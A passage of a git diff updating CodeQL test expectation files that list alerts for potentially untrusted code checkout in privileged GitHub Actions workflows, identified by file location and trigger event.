.github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | 
.github/workflows/dependabot3.yml | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | -| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | 
pull_request_target | .github/workflows/level0.yml | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | 
Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | -| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | -| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Execution of untrusted code on a privileged workflow ($@) 
| .github/workflows/test26.yml:4:3:4:14 | workflow_run | .github/workflows/test26.yml | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | -| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | -| 
.github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | 
.github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | 
.github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | 
.github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | 
.github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| 
.github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | 
.github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | 
pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 1d6122b37479..0d5cd4086a71 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected 
@@ -1,22 +1,22 @@ -| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. 
| -| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. 
| +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test13.yml:2:3:2:15 | 